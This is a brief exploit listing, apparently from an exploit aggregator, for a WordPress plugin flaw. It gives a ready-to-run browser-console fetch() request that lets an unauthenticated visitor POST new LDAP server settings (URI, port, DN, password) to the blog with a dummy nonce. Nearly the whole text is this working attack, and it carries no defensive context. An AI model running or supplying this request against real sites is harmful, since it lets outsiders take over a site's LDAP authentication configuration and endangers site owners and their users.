Share
## https://sploitus.com/exploit?id=WPEX-ID:0D9638B9-BF8A-474F-992D-2618884D3F67
Run the below command in the developer console of the web browser while being on the blog as an unauthenticated user

fetch("/", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": 'action=ldapConfig&ldapConfig_nonce=-&ldapURI=127.0.0.1&ldapEncrpytMethod=ldap&ldapport=389&ldapDN=user%40localhost&ldappassword=password',
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));